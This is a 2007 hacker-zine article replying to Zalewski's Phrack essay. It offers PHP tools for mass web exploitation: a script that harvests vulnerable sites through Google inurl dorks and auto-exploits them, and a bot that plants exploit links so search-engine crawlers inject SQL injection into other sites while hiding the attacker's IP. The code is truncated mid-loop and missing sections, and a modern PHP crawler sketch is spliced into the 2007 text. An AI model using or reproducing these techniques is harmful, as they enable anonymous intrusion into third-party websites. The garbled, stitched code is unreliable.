Title:  I, Bot. Taking advantage of robots' power.
        Re: "Against the System: Rise of the Robots" by Michal Zalewski
Author: Crossbower - crossbower#katamail.com
Site:   http://www.playhack.net
Date:   2007-04-18

---------------------------------------------------------------------------------

-[ SUMMARY ]---------------------------------------------------------------------
    0x00: Intro, let's start
    0x01: Abstract
    0x02: Implementation
    0x03: The code: Paranoid Android
    0x04: Conclusion
---------------------------------------------------------------------------------

---[ 0x00: Intro, let's start ]

Hello, everybody. I apologize for my poor English; it is not my first language. I hope you will excuse any errors ;)

This paper is a reply to an article published in Phrack by Michal Zalewski. He was the first to consider the possibility of taking advantage of the multitude of robots that scan the web every moment in search of information.

We begin with the introduction to Zalewski's article, then we will see how to implement his ideas in our own bots.

"Consider a remote exploit that is able to compromise a remote system without sending any attack code to his victim. Consider an exploit which simply creates local file to compromise thousands of computers, and which does not involve any local resources in the attack. Welcome to the world of zero-effort exploit techniques. Welcome to the world of automation, welcome to the world of anonymous, dramatically difficult to stop attacks resulting from increasing Internet complexity. Zero-effort exploits create their 'wishlist', and leave it somewhere in cyberspace - can be even its home host, in the place where others can find it. Others - Internet workers (see references, [D]) - hundreds of never sleeping, endlessly browsing information crawlers, intelligent agents, search engines... They come to pick this information, and - unknowingly - to attack victims. You can stop one of them, but can't stop them all.
You can find out what their orders are, but you can't guess what these orders will be tomorrow, hidden somewhere in the abyss of not yet explored cyberspace. Your private army, close at hand, picking orders you left for them on their way. You exploit them without having to compromise them. They do what they are designed for, and they do their best to accomplish it. Welcome to the new reality, where our A.I. machines can rise against us."

Now let's see how all this is possible in practice ;) Have fun!

-----------------------------------------------------------------------------[/]

---[ 0x01: Abstract ]

The idea that search engines (Google first of all) can be turned into powerful weapons in the hands of attackers is not new. Google hacking, search dorks and cache digging are all techniques that take advantage of a small part of what search engines know, but very few people, until now, have thought of using their most sensitive and powerful component, the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure by retrieving pages or documents, and recursively retrieving all documents that are referenced.

Note that "recursive" here doesn't limit the definition to any specific traversal algorithm. Even if a robot applies some heuristic to the selection and order of documents to visit and spaces out requests over a long period of time, it is still a robot.

Normal Web browsers aren't robots, because they are operated by a human and don't automatically retrieve referenced documents.

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders. These names are a bit misleading because they give the impression that the software itself moves between sites like a virus. This is not the case: a robot simply visits sites by requesting documents from them.

What kinds of robots are there?
Robots can be used for a number of purposes:

    * Indexing
    * HTML validation
    * Link validation
    * "What's New" monitoring
    * Mirroring

How many robots circulate on the web? For a complete overview you can consult the list of active robots (http://www.robotstxt.org/wc/active/html/type.html). We will not go into detail, because this topic is outside the scope of the article.

-----------------------------------------------------------------------------[/]

---[ 0x02: Implementation ]

What are the strengths of a bot? Certainly speed: the ability to execute a great number of operations in a short time.

For exploitation, we can write a bot with a mirroring-like function that, using the information found in a database or in a search engine, can carry out mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is this script. It queries a search engine such as Google (or another one) and builds an array with the addresses of sites that contain specific web pages. If configured to do so, it can automatically exploit many types of vulnerabilities (for example, SQL injection).

Although it is a simple script, it can become a destructive weapon if used in the wrong way (ok, noob?). I therefore ask any lamers reading this not to use it to cause damage. It is only a proof of concept.

- - - - - code: - - - - -
#!/usr/bin/php
<?php
if ($argc<2) {
    echo "Usage: ".$argv[0]." Example: ".$argv[0]." /script/vuln.php?cmd= 30 ";
    die;
}

//Init...
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function SendPack($packet)
{
    global $proxy, $host, $port, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port;
            die;
        }
    } else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
            echo 'Not a valid proxy...';
            die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';
            die;
        }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
        $buffer='';
        while (!feof($ock)) {
            $buffer.=fgets($ock);
        }
    } else {
        $buffer='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {
            $buffer.=fread($ock,1);
        }
    }
    fclose($ock);
    return($buffer);
}

//Global variables
$host="www.google.com";          //Our vulnerability database ;)
$path=$argv[1];                  //String
$port=80;                        //Port (Web)
$proxy="";                       //For your proxy
$html;                           //Buffer for result

//Google variables
$SeInurl="/search?q=inurl%3A";   //Search inurl
$SeType="&btnG=Search";          //Search type
if ($argv[2]) $SeNumber="&num=".$argv[2];
else $SeNumber="&num=20";        //Number of result

if ($path[0]<>'/') {print("*warning: string must begin with '/'\n");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//$path=urlencode($path);        //Url encoding

echo "1: Find Targets...\n\n";

//Google's inurl search (example):
//http://www.google.com/search?q=inurl%3A%2Fscript%2Fvuln.php%3Fcmd%3D&num=30&btnG=Search

/* Make and Send Query */
$packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$html=SendPack($packet);

/* Find targets urls */
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
for ($i=0; $i
- - - - - - - - - -

-----------------------------------------------------------------------------[/]

---[ 0x03: The code: Paranoid Android ]

Now let's try to implement something different: code that uses the search engines' crawlers in a truly new way.

The operation of a crawler is simple. In general, it starts with a list of URLs to visit, called the "seeds". As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit, called the "crawl frontier". URLs from the frontier are recursively visited according to a set of policies.
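The seed and frontier loop just described can be sketched in a few lines. This is only a minimal illustration, not the code of any real search engine: the `$web` array is a hypothetical in-memory stand-in for the web (no network access is involved), and the names `crawl` and `$maxPages` are assumptions made up for this example. The only "policy" here is breadth-first order with a page limit.

```php
<?php
// Hypothetical in-memory "web": each URL maps to the links found on that page.
// A real crawler would fetch and parse pages instead of reading this array.
$web = [
    'http://a.example/' => ['http://b.example/', 'http://c.example/'],
    'http://b.example/' => ['http://c.example/', 'http://d.example/'],
    'http://c.example/' => ['http://a.example/'],
    'http://d.example/' => [],
];

// Visit pages breadth-first, starting from the seeds.
// Returns the URLs in the order in which they were visited.
function crawl(array $web, array $seeds, int $maxPages = 100): array
{
    $frontier = $seeds;                     // URLs waiting to be visited
    $seen = array_fill_keys($seeds, true);  // URLs already queued once
    $visited = [];

    while ($frontier && count($visited) < $maxPages) {
        $url = array_shift($frontier);      // take the oldest queued URL
        $visited[] = $url;

        // Every link on the page goes into the frontier, unless it was
        // queued before. The crawler does not judge what a link does.
        foreach ($web[$url] ?? [] as $link) {
            if (!isset($seen[$link])) {
                $seen[$link] = true;
                $frontier[] = $link;
            }
        }
    }
    return $visited;
}

$order = crawl($web, ['http://a.example/']);
print_r($order);
```

Starting from the single seed `http://a.example/`, the pages are visited in the order a, b, c, d. The point to notice is that the frontier is filled entirely from what the visited pages contain: the crawler goes wherever the page author points it.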
As we can see, this method depends closely on the contents of a web page, which can send the crawler off to explore numerous other links.

Now we ask ourselves: how safe is this kind of method?

Suppose that a visited website contains exploit links (for example, SQL injection) that point to dynamic pages on other websites. What happens in this case?

The heuristic spider follows the links and injects the code into those websites. Then it saves all the results in the database of its search engine. Isn't that fantastic? ;)

And which IP remains in the logs? The IP of the search engine, which, with the many sites its spider visits every day, will have a hard time finding our malicious site. If it is willing to search at all... In any case, even if our site is uncovered, how many more searches are needed to find the culprit?

Now, since code is worth more than a thousand words, here is a robot that, if configured correctly, can use the techniques described in this article. Voilà, Paranoid Android:

- - - - - code: - - - - -
Paranoid Android, By Crossbower
Automatic SaE (search-and-exploit) Bot
by Crossbower Crossbower*katamail*com
";

//Loading...
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function SendPack($packet)
{
    global $host, $port;
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
        echo 'No response from '.$host.':'.$port;
        die;
    }
    fputs($ock,$packet);
    $buffer='';
    while (!feof($ock)) {
        $buffer.=fgets($ock);
    }
    fclose($ock);
    return($buffer);
}

//START:
/* Make and Send Query */
$packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$html=SendPack($packet);

//Open log file
$handle =fopen($LogFile,'a');

//Initialize the log
fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."<br><br>\n");
fwrite($handle,"Visited by:<br>\n");
$Spider =$REMOTE_HOST."<br>".$REMOTE_ADDR."<br>";
$Spider.=$HTTP_USER_AGENT."<br>".$HTTP_REFERER."<br>";
$Spider.=$HTTP_ACCEPT_LANGUAGE."<br><br>\n";
fwrite($handle,$Spider);
fwrite($handle,"Links (google cache):<br>\n");
$Log ="".$match[1][$i].$exploit."<br>\n";
//Update log
fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."<br>\n");
}}

//Close log
fwrite($handle,"<br><br>\n");
fclose($handle);
?>
- - - - - - - - - -

-----------------------------------------------------------------------------[/]

---[ 0x04: Conclusion ]

I hope this information has interested you and has made you understand the gravity of the attacks that robots may make possible in the future...

To learn more, you can read these documents:

- "Against the System: Rise of the Robots", Michal Zalewski
  http://www.phrack.org/archives/57/p57-0x13

- "The Anatomy of a Large-Scale Hypertextual Web Search Engine" (Googlebot concept), Sergey Brin, Lawrence Page, Stanford University
  http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm

- "Proprietary web solutions security", Michal Zalewski
  http://lcamtuf.coredump.cx/milpap.txt

- "A Standard for Robot Exclusion", Martijn Koster
  http://info.webcrawler.com/mak/projects/robots/norobots.html

- "The Web Robots Database"
  http://www.robotstxt.org/wc/active.html
  http://www.robotstxt.org/wc/active/html/type.html

- "Web Security FAQ", Lincoln D. Stein
  http://www.w3.org/Security/Faq/www-security-faq.html

OK, that's all, folks... For clarifications, questions or anything else, don't hesitate to mail me ;)

Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

-----------------------------------------------------------------------------[/]